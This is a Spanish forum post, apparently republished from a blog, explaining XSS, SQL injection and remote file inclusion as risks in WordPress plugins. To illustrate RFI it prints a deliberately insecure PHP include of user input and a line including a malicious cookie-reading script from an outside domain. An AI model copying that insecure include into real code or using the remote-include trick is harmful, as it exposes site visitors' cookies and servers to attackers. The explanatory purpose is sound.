Seguridad de Plugins WordPress: ¿Que es peligroso?

Hola hoy les traigo esta Info que encontre. Hemos establecido que la regla de oro en la seguridad web es comprobar los "gateways". Y esto es vigilar las áreas de un sitio web que un atacante podría utilizar para enviar datos a tu web. Me gustaría ahondar mas en esto hoy.

El experto en soporte WordPress, Podz, pregunta en su blog, "¿Que es peligroso?"

La respuesta está en comprender los vectores de ataque. Los vectores de ataque, tales como Scripts Cruzados, Inyecciones SQL e Inclusión de Fichero Remoto, son algunos de los métodos mas utilizados para atacar una web. Si entiendes los principios en los que se basan tendrás una mayor comprensión de lo que necesitas buscar en un plugin. Así que vamos a ello ¿no crees?.

Scripts Cruzados (XSS)

Los Scripts Cruzados han sido descritos por Network World como la "mayor amenaza de seguridad". Scripts Cruzados es un término general que se refiere a la inyección de javascript en una página. Y como la zona javascript permite al navegador hacer una amplia variedad de cosas, incluyendo el potencial de ejecutar código en el sistema de archivos, permitir a un atacante un vector para conseguir meter ese código en tu ordenador o web es peligroso. Un ejemplo de XSS sería el fallo de Democracy 1.2. Un punto común de entrada de un XSS es un formulario HTML (formulario de contacto, tagboard, etc) o la barra de direcciones.

Inyección SQL

Desde un punto de vista de programación, la inyección SQL ocurre cuando la entrada desde el navegador (ya sea desde un formulario o la barra de direcciones o lo que sea) se filtra inadecuadamente para hacerla "segura" y luego alimenta directamente una base de datos. Este vector de ataque permitiría que el contenido de una web (que esté apoyado en bases de datos) sea alterado o incluso borrado. Podría también utilizarse en combinación con XSS para inyectar javascript malicioso o scripts de servidor en el contenido de una página.

Inclusión de Fichero Remoto

Un tercer vector de ataque que debería evitarse es la inclusión de fichero remoto. Esto es utilizar una función PHP ( <a href="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta</a>) para insertar una pieza de código alojado en cualquier sitio y ejecutado en el servidor remoto. En otras palabras, un atacante puede escribir un pequeño script que registre direcciones IP, cookies, etc, y si puede incluir en la web un script PHP de su sitio, puede ofrecer información valiosa al atacante. La IFR suele encontrarse normalmente cuando una entrada de usuario (formulario, barra de direcciones) se incluye directamente en un include().

Por ejemplo, un enlace de este tipo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta poddría tener algún código que facilite el contenido adecuado <?php include($_GET['page'].".php"); ?>. Este tipo de código descuidado es mas habitual de lo que te imaginas. La intención del desarrollador podría ser, en este ejemplo, incluir los contenidos de about.php en la página principal. Sin embargo, piensa que pasaría si mando esta petición a mi navegador:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entonces, su página estaría ejecutando en realidad esta orden:

< ?php include("http://midominio.com/script_lectura_cookie_maliciosa.php"); ?>

Un asunto muy peligroso.

¿Como afecta esto a WordPress?

En los siguientes artículos de esta serie echaremos un vistazo a las implicaciones de seguridad específicas a los plugins de WordPress. Cualquier plugin que se use debería inspeccionarse inicialmente para ver si permite la interacción con el usuario. Si permite la interacción del usuario podría ser propenso a uno de estos ataques de vectores. No asumas, no obstante, que un plugin que acepte interacción es peligroso. Es cuestión del código y el desarrollador ofrecer una entrada de usuario apropiada y segura.

Saludos..